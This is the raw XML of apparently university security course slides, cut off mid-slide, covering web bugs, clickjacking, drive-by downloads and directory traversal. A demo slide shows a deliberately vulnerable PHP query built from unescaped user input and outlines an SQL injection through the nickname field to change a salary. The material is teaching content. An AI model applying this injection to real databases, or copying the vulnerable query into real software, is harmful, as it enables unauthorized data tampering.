          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54AA84D3-B7B3-4A4C-8A33-75A9BA0F378E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5609195" y="1091317"/>
            <a:ext cx="3314319" cy="3281009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376679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FF79-0564-F049-941D-4AB522140EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Construct query to update info</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B5F2D93-9C8F-FD44-8273-241EA1010827}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD411523-96B0-E040-9690-E382520AB4ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="4294967295"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="583549" y="944563"/>
            <a:ext cx="7886700" cy="2824162"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2350230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1593-FB85-BF4D-AE20-CE4608D594E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Demo #2 Update my salary </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F99DB4D-98EB-D14D-8846-5C9D67B8CD23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>﻿$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "UPDATE credential SET nickname='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>input_nickname',email</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>input_email',address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>input_address',Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='$hashed_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>PhoneNumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>input_phonenumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' where ID=$id;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8C6E43"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What we want: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE credential SET salary=‘200000’ where name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Construct a query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE credential SET nickname=‘                    ‘,email=… where ID=$id;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8B793F7-34F3-1C48-ABAD-B58CBA3073F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4668274" y="3345426"/>
            <a:ext cx="1148913" cy="253916"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3458762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9490-BDD8-4C58-8529-7314F6033966}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Please attribute Dr. Jim Alves-Foss and Dr. Jia Song, University of Idaho</a:t>
            </a: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Except where otherwise noted, this work is licensed under https://creativecommons.org/licenses/by-nc-sa/4.0/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Not withstanding the non-commercial license terms, non-profit educational institutions are granted a non-exclusive license to adapt and use this material, with attribution.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creative Commons and the double C in a circle are registered trademarks of Creative commons in the United States and other countries. Third party marks and brands are the property of their respective holders.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="392882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2F02-4D65-3846-A689-7E897C706189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="330851" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web bug</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ABCEF04-4585-AA49-8FB4-42299DC0FBC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5034116" y="944563"/>
            <a:ext cx="3525684" cy="3303587"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A web bug (clear GIF, tracking bug), is a tiny image, as small as 1 pixel by 1 pixel, an image so small it will not normally be seen. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It is loaded and processed the same as a larger picture. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It notifies the bug’s owner that a user has loaded the image.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4687D400-BB43-5144-B62C-F7E15A2B712D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-12.eps">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F9877BA-6C68-5748-B11A-A23EDF7C311E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-330" b="-669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="756595" y="797620"/>
            <a:ext cx="3996996" cy="3597471"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2716435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err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{298DCE16-A529-AC4D-81CF-FCAC28460189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="4306436" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Clickjacking is a way of tricking users into providing desired input. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker makes the input dialog transparent and places an image below the transparent dialog. The user ends up answering a question he didn’t even know he was being asked, unknowingly authorizing his computer to execute the attacker’s will. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-13.eps"/>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3075" b="-8587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5574890" y="1186013"/>
            <a:ext cx="2984910" cy="2814118"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194323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a:t>Drive-By Download</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code is downloaded, installed, and executed on a computer without the user’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>permission</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>usually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>knowledge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>unwanted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>toolbars)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>May be the result of clickjacking, fake code, program download substitution, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48411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altLang="zh-CN" dirty="0"/>
              <a:t>Obtaining</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Dot-Dot-Slash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400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2F5A62-0136-2B47-AC97-51F2AA14B873}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1969666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51" y="205932"/>
            <a:ext cx="8229600" cy="571589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Dot-Dot-Slash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914493" y="944563"/>
            <a:ext cx="7645958" cy="3303437"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also known as “directory traversal,” this is when attackers use the term “../” to access files that are on the target web server but not meant to be accessed from outside</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Most commonly entered into the URL bar but may also be combined with other attacks, such as XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>causes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>server</a:t>
            </a:r>
            <a:r>
